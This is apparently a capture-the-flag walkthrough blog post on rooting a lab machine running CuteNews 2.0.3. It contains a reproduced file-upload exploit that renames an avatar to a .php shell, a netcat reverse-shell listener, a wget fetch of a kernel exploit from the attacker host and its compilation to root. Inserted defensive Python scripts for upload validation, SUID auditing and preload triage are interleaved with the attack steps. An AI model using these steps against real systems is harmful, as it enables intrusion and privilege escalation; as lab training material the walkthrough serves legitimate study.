BNE0x03Simple target machine

CuteCMS 2.0.3 has a public exploit whose write-up is unusually helpful: it walks you through a standardised bug-hunting and penetration process almost step by step. The kernel privilege escalation on this machine ran into a lot of problems, a small crash scene of its own, which is also what a real kernel privilege escalation looks like: face reality and learn from it. An easy machine, but one that is well worth thinking about.

Information gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.104
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-26 22:32 EDT
Nmap scan report for 192.168.56.104
Host is up (0.000093s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:72:6C:8B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.83 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p80 192.168.56.104
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-26 22:34 EDT
Nmap scan report for 192.168.56.104
Host is up (0.00036s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Please Login / CuteNews
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 08:00:27:72:6C:8B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.14 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p80 192.168.56.104
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-26 22:42 EDT
Nmap scan report for 192.168.56.104
Host is up (0.00031s latency).

PORT STATE SERVICE
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum:
|_ /rss.php: RSS or Atom feed
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.104
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.56.104:80/
| Form id: login_form
| Form action: /index.php
|
| Path: http://192.168.56.104:80/?register
| Form id: regpassword
| Form action: /index.php?register
|
| Path: http://192.168.56.104:80/?register&lostpass
| Form id:
| Form action: /index.php
|
| Path: http://192.168.56.104:80/index.php
| Form id: login_form
| Form action: /index.php
|
| Path: http://192.168.56.104:80/index.php?register
| Form id: regpassword
|_ Form action: /index.php?register
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 08:00:27:72:6C:8B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 321.44 seconds

Looking at the web interface

It turns out to be a login page that shows the product name and version number, so try searchsploit to look for known exploits.

┌──(kali㉿kali)-[~]
└─$ searchsploit CuteNews 2.0
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CuteNews 2.0.3 - Arbitrary File Upload | php/webapps/37474.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Copy the file locally and look at its contents

┌──(kali㉿kali)-[~]
└─$ searchsploit -m 37474
Exploit: CuteNews 2.0.3 - Arbitrary File Upload
URL: https://www.exploit-db.com/exploits/37474
Path: /usr/share/exploitdb/exploits/php/webapps/37474.txt
File Type: ASCII text

Copied to: /home/kali/37474.txt



┌──(kali㉿kali)-[~]
└─$ cat 37474.txt
CuteNews 2.0.3 Remote File Upload Vulnerability
=================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I'm T0x!c member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1



# Exploit Title: CuteNews 2.0.3 Remote File Upload Vulnerability
# Date: [02/07/2015]
# Exploit Author: [T0x!c]
# Facebook: https://www.facebook.com/Dz.pr0s
# Vendor Homepage: [http://cutephp.com/]
# Software Link: [http://cutephp.com/cutenews/cutenews.2.0.3.zip]
# Version: [2.0.3]
# Tested on: [Windows 7]
# greetz to :Tr00n , Kha&mix , Cc0de , Ghosty , Ked ans , Caddy-dz .....
==========================================================
# Exploit :

Vuln : http://127.0.0.1/cutenews/index.php?mod=main&opt=personal

1 - Sign up for New User
2 - Log In
3 - Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal
4 - Select Upload Avatar Example: Evil.jpg
5 - use tamper data & Rename File Evil.jpg to Evil.php

-----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\

6 - Your Shell : http://127.0.0.1/cutenews/uploads/avatar_Username_FileName.php

Example: http://127.0.0.1/cutenews/uploads/avatar_toxic_Evil.php

CuteCMS 2.0.3 file upload vulnerability

That gives us a very detailed exploitation procedure. Follow the instructions to upload a file, using Burp Suite to modify the upload request.

The server answers 200, so the upload succeeded; let's look in the uploads directory

The upload worked and the file is where the exploit write-up said it would be. Next, start a listener and then request the php file; the reverse shell connects.
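As a defender's counterpart to the upload trick above, here is an added example (my code, not CuteNews code and not from the original post) of how an avatar upload handler can refuse a multipart filename that was rewritten to .php. The storage extension is derived from the file content, not from the request, and the stored name does not echo the client filename, which is what made the uploaded path predictable in the write-up. The size cap, the signature table, the naming scheme and the sample bytes are my assumptions.

```python
import hashlib
import re
import secrets

# Magic bytes for the only formats an avatar field should accept (assumed allow-list).
_SIGNATURES = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
_ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
_MAX_BYTES = 512 * 1024  # assumed size cap for an avatar; tune per site


class UploadRejected(ValueError):
    """Raised for any upload that is not a plain image."""


def sniff_image_type(data: bytes):
    """Identify the image format from the leading bytes; None when nothing matches."""
    for magic, kind in _SIGNATURES.items():
        if data.startswith(magic):
            return kind
    return None


def validate_avatar(client_filename: str, data: bytes) -> str:
    """Check an uploaded avatar and return the extension it will be stored with.

    The client filename is only used for a coarse allow-list check; the stored
    extension comes from the content, so a Content-Disposition filename rewritten
    to .php (the step in the exploit above) cannot decide how the file is served.
    """
    if not data or len(data) > _MAX_BYTES:
        raise UploadRejected("empty or oversized upload")
    # Only the final extension counts, so 'shell.php.jpg' still has to pass sniffing.
    ext = client_filename.rsplit(".", 1)[-1].lower() if "." in client_filename else ""
    if ext not in _ALLOWED_EXT:
        raise UploadRejected(f"extension {ext!r} is not an image extension")
    kind = sniff_image_type(data)
    if kind is None:
        raise UploadRejected("content does not carry an image signature")
    # A valid image header followed by a PHP open tag is the classic polyglot;
    # refuse it rather than trusting the header alone.
    if b"<?php" in data or b"<?=" in data:
        raise UploadRejected("image contains a PHP open tag")
    return kind


def stored_name(username: str, data: bytes, ext: str) -> str:
    """Build a storage name that neither echoes the client filename nor is guessable.

    The write-up relies on the predictable avatar_<user>_<file> pattern; here the
    name is a content hash plus a random token.
    """
    safe_user = re.sub(r"[^a-z0-9]", "", username.lower()) or "user"
    digest = hashlib.sha256(data).hexdigest()[:16]
    return f"avatar_{safe_user}_{digest}_{secrets.token_hex(4)}.{ext}"


def handle_upload(username: str, client_filename: str, data: bytes) -> str:
    """Validate, then name. Returns the storage name or raises UploadRejected."""
    ext = validate_avatar(client_filename, data)
    return stored_name(username, data, ext)


if __name__ == "__main__":
    # Constructed samples: a minimal JPEG header, and PHP text under two filenames.
    good = b"\xff\xd8\xff\xe0" + b"\x00" * 64
    print(handle_upload("alice", "avatar.jpg", good))
    for name, blob in [("Evil.php", b"<?php echo 1; ?>"), ("Evil.jpg", b"<?php echo 1; ?>")]:
        try:
            handle_upload("alice", name, blob)
        except UploadRejected as err:
            print(name, "rejected:", err)
```

The validator is only half of the fix: the uploads directory should also be served with script execution disabled, so that even a file that slips through is returned as static bytes rather than handed to the PHP interpreter.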

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.104] 46398
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 athlon i686 GNU/Linux
22:51:10 up 20 min, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Privilege escalation

Information gathering

$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@simple:/$ uname -a
uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 athlon i686 GNU/Linux
www-data@simple:/$ whoami
whoami
www-data
www-data@simple:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@simple:/$ sudo -l
sudo -l
[sudo] password for www-data:

Sorry, try again.
[sudo] password for www-data:

Sorry, try again.
[sudo] password for www-data:

Sorry, try again.
sudo: 3 incorrect password attempts

Nothing from sudo, but we now have the kernel version and the operating system details.

www-data@simple:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
landscape:x:104:110::/var/lib/landscape:/bin/false
bull:x:1000:1000:bull,,,:/home/bull:/bin/bash
www-data@simple:/$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied

No permission to read shadow. The shell history files of the users under home turned up nothing either, so try SUID binaries next.

www-data@simple:/usr/share/mysql$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
278515 316 -rwsr-xr-- 1 root dip 323000 Nov 25 2014 /usr/sbin/pppd
278836 20 -rwsr-sr-x 1 libuuid libuuid 17996 Feb 12 2015 /usr/sbin/uuidd
280600 12 -rwsr-xr-x 1 root root 9804 Feb 11 2014 /usr/lib/policykit-1/polkit-agent-helper-1
263326 12 -rwsr-xr-x 1 root root 9612 Dec 4 2014 /usr/lib/pt_chown
278398 484 -rwsr-xr-x 1 root root 492972 May 12 2014 /usr/lib/openssh/ssh-keysign
262362 8 -rwsr-xr-x 1 root root 5480 Feb 25 2014 /usr/lib/eject/dmcrypt-get-device
276259 328 -rwsr-xr-- 1 root messagebus 333952 Nov 25 2014 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
262155 32 -rwsr-xr-x 1 root root 30984 Feb 16 2014 /usr/bin/newgrp
262012 44 -rwsr-xr-x 1 root root 44620 Feb 16 2014 /usr/bin/chfn
262015 36 -rwsr-xr-x 1 root root 35916 Feb 16 2014 /usr/bin/chsh
262273 156 -rwsr-xr-x 1 root root 156708 Feb 10 2014 /usr/bin/sudo
280595 20 -rwsr-xr-x 1 root root 18168 Feb 11 2014 /usr/bin/pkexec
262086 68 -rwsr-xr-x 1 root root 66252 Feb 16 2014 /usr/bin/gpasswd
278261 20 -rwsr-xr-x 1 root root 18136 May 7 2014 /usr/bin/traceroute6.iputils
278345 72 -rwsr-xr-x 1 root root 72860 Oct 21 2013 /usr/bin/mtr
279461 48 -rwsr-sr-x 1 daemon daemon 46652 Oct 21 2013 /usr/bin/at
262167 48 -rwsr-xr-x 1 root root 45420 Feb 16 2014 /usr/bin/passwd
277224 32 -rwsr-xr-x 1 root root 30112 Dec 16 2013 /bin/fusermount
261725 36 -rwsr-xr-x 1 root root 35300 Feb 16 2014 /bin/su
261706 44 -rwsr-xr-x 1 root root 43316 May 7 2014 /bin/ping6
261705 40 -rwsr-xr-x 1 root root 38932 May 7 2014 /bin/ping
261692 88 -rwsr-xr-x 1 root root 88752 Feb 12 2015 /bin/mount
261733 68 -rwsr-xr-x 1 root root 67704 Feb 12 2015 /bin/umount
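The SUID sweep above is also what a defender should be comparing against a baseline after a compromise. The following added example (my code, not from the post) parses `find -ls` output in the format shown and reports setuid binaries that are outside an expected baseline, live in a user-writable tree, or are world-writable. The baseline set, the writable-tree list and the two extra sample lines are constructed for the demonstration; the other sample lines are taken from the output above.

```python
from dataclasses import dataclass

# Trees that should never host a setuid binary on a server (assumed list).
_WRITABLE_TREES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/var/www/")


@dataclass(frozen=True)
class SuidEntry:
    perms: str
    owner: str
    group: str
    size: int
    path: str


def parse_find_ls(text: str):
    """Parse `find / -type f -perm -04000 -ls` output into SuidEntry records.

    Field order from find -ls: inode, blocks, perms, links, owner, group, size,
    month, day, year-or-time, path. The path may contain spaces, so the split
    stops after ten fields.
    """
    entries = []
    for line in text.splitlines():
        parts = line.split(None, 10)
        if len(parts) < 11 or not parts[2].startswith("-"):
            continue  # skip prompts, echoed commands, and non-regular files
        entries.append(SuidEntry(parts[2], parts[4], parts[5], int(parts[6]), parts[10]))
    return entries


def audit_suid(entries, baseline):
    """Return (path, reason) pairs for entries that deserve a closer look."""
    findings = []
    for e in entries:
        if e.path.startswith(_WRITABLE_TREES):
            findings.append((e.path, "setuid file inside a user-writable tree"))
        elif e.perms[8] == "w":  # 'others' write bit in the -rwsr-xr-x string
            findings.append((e.path, "world-writable setuid file"))
        elif e.path not in baseline:
            findings.append((e.path, f"not in baseline (owner {e.owner}:{e.group})"))
    return findings


# Sample input: prompt, echoed command and a few lines from the sweep above,
# plus two constructed lines at the end that should be flagged.
SAMPLE_FIND_OUTPUT = """\
www-data@simple:/usr/share/mysql$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
278515 316 -rwsr-xr-- 1 root dip 323000 Nov 25 2014 /usr/sbin/pppd
262273 156 -rwsr-xr-x 1 root root 156708 Feb 10 2014 /usr/bin/sudo
280595 20 -rwsr-xr-x 1 root root 18168 Feb 11 2014 /usr/bin/pkexec
261725 36 -rwsr-xr-x 1 root root 35300 Feb 16 2014 /bin/su
261692 88 -rwsr-xr-x 1 root root 88752 Feb 12 2015 /bin/mount
999001 12 -rwsr-xr-x 1 root root 8888 May 26 23:05 /tmp/.x/helper
999002 12 -rwsrwxrwx 1 root root 9999 May 26 23:06 /usr/local/bin/backup tool
"""

# Constructed baseline: the paths an administrator recorded on a clean install.
EXAMPLE_BASELINE = {"/usr/sbin/pppd", "/usr/bin/sudo", "/usr/bin/pkexec", "/bin/su", "/bin/mount"}


def audit_sample():
    """Run the audit over the embedded sample; returns the findings list."""
    return audit_suid(parse_find_ls(SAMPLE_FIND_OUTPUT), EXAMPLE_BASELINE)


if __name__ == "__main__":
    for path, reason in audit_sample():
        print(f"{path}: {reason}")
```

On a live host, feed the function the output of the same find command captured to a file, and build the baseline from a known-good image rather than from the machine under investigation.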

Still nothing, so consider a kernel privilege escalation

Start an HTTP server with python on the attacking machine, then download the file from the shell

www-data@simple:/tmp$ wget http://192.168.56.106:8088/37292.c
wget http://192.168.56.106:8088/37292.c
--2023-05-26 23:02:01-- http://192.168.56.106:8088/37292.c
Connecting to 192.168.56.106:8088... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: '37292.c'

100%[======================================>] 4,968 --.-K/s in 0s

2023-05-26 23:02:01 (1.06 GB/s) - '37292.c' saved [4968/4968]

The attempt succeeds

www-data@simple:/tmp$ mv 37292.c ofs.c
mv 37292.c ofs.c
www-data@simple:/tmp$ gcc ofs.c -o ofs
gcc ofs.c -o ofs
www-data@simple:/tmp$ ./ofs
./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
whoami
root
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
cd /root
# ls -liah
ls -liah
total 20K
261842 drwx------ 2 root root 4.0K Sep 21 2015 .
2 drwxr-xr-x 21 root root 4.0K Sep 9 2015 ..
261843 -rw-r--r-- 1 root root 3.1K Feb 19 2014 .bashrc
261844 -rw-r--r-- 1 root root 140 Feb 19 2014 .profile
261852 -rw------- 1 root root 52 Sep 21 2015 flag.txt
# cat flag.txt
cat flag.txt
U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!
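The run above leaves two things a responder can check afterwards: the exploit output says it created /etc/ld.so.preload, and the kernel release shown by `uname -a` is what decides whether the host was exposed in the first place. The added example below (my code, not the post's) parses an Ubuntu kernel release string into a comparable tuple, checks it against a fixed release, and reviews the contents of /etc/ld.so.preload, a file that normally does not exist on a server that never configured it. EXAMPLE_FIXED_RELEASE is a placeholder threshold for the illustration, not a value taken from the page; the real one comes from the distribution's advisory for the exploit in use. The preload sample is constructed.

```python
import re
from typing import Optional

# Placeholder for illustration only: the release at which the distribution shipped
# the fix. Take the real value from the vendor advisory for the exploit in question.
EXAMPLE_FIXED_RELEASE = "3.16.0-41-generic"

# Locations from which nothing should ever be preloaded system-wide (assumed list).
_WRITABLE_TREES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def parse_kernel_release(release: str):
    """Turn '3.16.0-30-generic' into (3, 16, 0, 30) so releases compare numerically."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)-(\d+)", release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return tuple(int(x) for x in m.groups())


def release_from_uname(uname_a: str) -> str:
    """The third field of `uname -a` is the kernel release."""
    return uname_a.split()[2]


def kernel_is_older_than(running: str, fixed: str) -> bool:
    """True when the running release predates the release carrying the fix."""
    return parse_kernel_release(running) < parse_kernel_release(fixed)


def preload_findings(preload_text: Optional[str], expected=()):
    """Review /etc/ld.so.preload contents; None means the file does not exist.

    Returns (library, reason) pairs. Any entry not in `expected` is reported,
    with a sharper reason when it points into a user-writable tree.
    """
    if preload_text is None:
        return []
    findings = []
    for line in preload_text.splitlines():
        lib = line.strip()
        if not lib or lib.startswith("#") or lib in expected:
            continue
        if lib.startswith(_WRITABLE_TREES):
            reason = "preloaded from a user-writable location"
        elif not lib.startswith("/"):
            reason = "relative path in a system-wide preload"
        else:
            reason = "not in the expected preload list"
        findings.append((lib, reason))
    return findings


def triage(uname_a: str, preload_text: Optional[str], fixed_release: str = EXAMPLE_FIXED_RELEASE):
    """Combine both checks into one report dictionary."""
    release = release_from_uname(uname_a)
    return {
        "kernel_release": release,
        "kernel_unpatched": kernel_is_older_than(release, fixed_release),
        "preload_present": preload_text is not None,
        "preload": preload_findings(preload_text),
    }


if __name__ == "__main__":
    # uname line as printed on the box above; preload content is constructed.
    uname = ("Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP "
             "Thu Jan 15 17:45:15 UTC 2015 i686 athlon i686 GNU/Linux")
    print(triage(uname, "/tmp/example-lib.so\n"))
```

On a real host, pass `open("/etc/ld.so.preload").read()` when the file exists and None otherwise; because the exploit above writes that file as part of its method, its mere presence on a host that never used it is already worth an alert, before any entry is inspected.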

https://i3eg1nner.github.io/2023/05/877acee13580.html
Author: I3eg1nner
Published: May 27, 2023